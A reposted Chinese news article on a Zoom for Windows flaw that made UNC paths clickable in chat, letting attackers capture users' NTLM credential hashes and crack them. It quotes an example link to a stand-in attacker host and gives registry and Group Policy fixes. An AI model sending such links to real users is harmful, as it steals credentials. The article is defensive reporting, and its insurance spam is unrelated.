Zoom客户端爆出安全漏洞 可向攻击者泄露Windows登陆凭据


中银三星人寿,专业保险代理(车险、寿险、健康险、财险)--微信咨询:zhao765957503

近日,Windows 版 Zoom 客户端爆出了容易受到 NUC 路径注入攻击的安全漏洞。作为一款音视频会议应用,Zoom 还允许用户在聊天界面通过发送文本消息来互相交流。然而外媒 Bleeping Computer 指出,攻击者可利用聊天模块的漏洞,窃取点击了相关链接的用户的 Windows 登陆凭据。
20200401_-7 
【UNC 注入示例】

发送聊天消息时,所有发送的 URL 都将经过转换,以便群内其他成员点击,继而在默认的浏览器中打开网页。

然而安全研究人员 @ _g0dmode 发现,Zoom 客户端竟然还将 Windows 网络 UNC 路径,也转换成了聊天消息中可单击的链接。

如图所示,常规 URL 和 NUC 路径(\evil.server.comimagescat.jpg),都被转换成了聊天消息中的可点击链接。

20200401_-8 
【捕获的 NTLM 密码哈希值】

若用户单击 UNC 路径链接,则 Windows 将尝试使用 SMB 文件共享协议连接到远程站点,以打开远程路径中的 cat.jpg 文件。

默认情况下,Windows 将发送用户的登录名和 NTLM 密码哈希值,但稍有经验的攻击者均可借助 Hashcat 之类的免费工具来逆向运算。

20200401_-9 
【简单密码可在 16 秒内被暴力破解】

安全研究人员 Matthew Hickey(@ HackerFantastic)实测发现,其能够在 Zoom 中顺利注入,并且可以借助当前的民用级 GPU 和 CPU 来快速破解。

除了窃取 Windows 登陆凭据,Hickey 还向 Bleeping Computer 透露,通过点击链接的方式,UNC 注入还适用于启动本地计算机上的程序(比如 CMD 命令提示符)。

20200401_-10 
【程序运行提示】

庆幸的是,Windows 会在程序被执行前发出是否允许其运行的提示。想要堵上这一漏洞,Zoom 必须阻止 Windows 客户端的 UNC 路径转换功能(屏蔽部分可点击的超链接)。

据悉,Hickey 已经在 Twitter 上向 Zoom 官方发去了有关该安全漏洞的通知,但目前尚不清楚该公司已采取怎样的行动。
20200401_-11 
注重安全的客户,可在官方补丁发布前,通过组策略来限制向远程服务器传出 NTLM 通信(参考如下操作):

计算机配置 -> Windows 设置 -> 安全设置 -> 本地策略 -> 安全选项 -> 网络安全:限制NTLM -> 发送到远程服务器的 NTLM 通信(然后全部配置为拒绝)。

20200401_-12 
需要注意的是,如果在已经加入相关域的计算机上配置上述组策略时,可能会在尝试访问共享时遇到问题。

如果是无权访问组策略设置 Windows 10 家庭版用户,亦可使用注册表编辑器来完成相关限制操作(dword 配置为 2):

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaMSV1_0]”RestrictSendingNTLMTraffic”=dword:00000002
20200401_-13 
如需正确创建此键值,Windows 用户记得以管理员身份来启动注册表编辑器。

若日后有必要恢复默认发送 NTLM 凭据的 Windows 行为,也只需删除对应的 RestrictSendingNTLMTraffic 键值。

本站声明:转载此文是出于传递更多信息之目的。若本站有侵犯了您的合法权益,请您及时与本站联系,我们将及时更正、删除,谢谢。:94推-94TUI.CN » Zoom客户端爆出安全漏洞 可向攻击者泄露Windows登陆凭据

中银三星人寿,专业保险代理(车险、寿险、健康险、财险)--微信咨询:zhao765957503

评论 0

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址